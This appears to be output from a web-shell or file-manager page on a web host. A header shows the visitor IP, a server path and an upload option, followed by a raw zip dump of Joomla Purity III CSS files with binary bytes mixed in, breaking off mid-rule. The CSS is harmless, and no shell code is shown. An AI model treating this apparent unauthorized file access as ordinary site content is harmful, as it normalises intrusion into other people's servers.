Your IP : 216.73.216.209


Current Path : /home/megadansyp/www/e392e/
Upload File :
Current File : /home/megadansyp/www/e392e/templates.zip

PKӜ�\��w��purity_iii/css/offline.cssnu&1i�body {
  background: #fff;
  font-family: sans-serif;
  font-size: 16px;
  line-height: 1.5;
  margin: 0;
  padding: 0;
}

/* LAYOUT
----------------------------------------------------- */
#frame {
  background: #fcfcfc;
  border: 1px solid #ddd;
  margin: 100px auto 0;
  width: 600px;
}

/* Logo */
#frame h1 {
  background: #07b;
  color: #fff;
  margin: 0;
  padding: 15px 0;
  text-align: center;
}

#frame .offline-message {
  background: #fff;
  border-bottom: 1px solid #eee;
  color: #666;
  margin-top: 0;
  padding: 15px 20px;
  text-align: center;
}

/* Form login */
#form-login label {
  color: #666;
}

#form-login fieldset {
  border: 0;
  margin: 0;
  padding: 0 20px;
}

#form-login #form-login-username,
#form-login #form-login-password {
  float: left;
  margin-right: 10px;
  width: 270px;
}

#form-login #form-login-password {
  margin-right: 0;
  margin-left: 10px;
}

#form-login #form-login-username label,
#form-login #form-login-password label {
  display: block;
  margin-bottom: 3px;
}

#form-login #form-login-username .inputbox,
#form-login #form-login-password .inputbox {
  border: 1px solid #ddd;
  box-sizing: border-box;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  height: 36px;
  line-height: 36px;
  padding: 0 10px;
  width: 100%;
}

#form-login #form-login-remember .inputbox {
  vertical-align: middle;
}

#form-login #submit-buton label {
  display: none;
}

#form-login #submit-buton .button {
  border: 1px solid #ccc;
  font-size: 16px;
  padding: 8px 20px;
}

#form-login #submit-buton .button:hover {
  background: #07b;
  border-color: #07b;
  color: #fff;
  cursor: pointer;
}

/* Warning Message */

#system-message {
    width: 600px;
    margin: 0 auto;
}

.alert-warning {
    background-color: #de614f;
    border: 1px solid #dc4248;
    border-radius: 3px;
    font-size: 14px;
    margin-top: 50px;
    padding: 10px 15px;
}

.alert-warning h4, .alert-warning p {
    color: #fff;
    margin: 0;
}

.alert-warning a.close {
    background-color: #fff;
    padding: 8px 4px;
    border: 1px solid #dc4248;
    border-radius: 50%;
    float: right;
    display: block;
    line-height: 0;
    color: #dc4248;
}

.alert-warning a:hover {
    cursor: pointer;
}
PKӜ�\��swHwH purity_iii/css/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: left;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-left: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-left: 0;
  margin-right: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: left;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: left;
  margin-right: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  left: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: left;
  padding-left: 10px !important;
  padding-right: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  left: auto;
  right: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\+e���-purity_iii/css/rtl/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\�?���-purity_iii/css/rtl/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-right: 0;
  margin-left: 0;
}PKӜ�\�l�d��*purity_iii/css/rtl/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 0 5px 10px;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\��QQ*purity_iii/css/rtl/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-right: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: right;
  margin: 0;
  margin-left: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 0 10px 10px;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-right: 1px solid #eeeeee;
  margin-right: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #0077bb;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #0077bb;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 0 0 20px;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 0 20px 20px !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .left .cart div input[type="text"],
.com_mijoshop .product-info .left .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .left .cart div input[type="text"] {
  padding-right: 5px;
  padding-left: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 0 10px 10px;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\�S�??+purity_iii/css/rtl/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-left: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-right: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
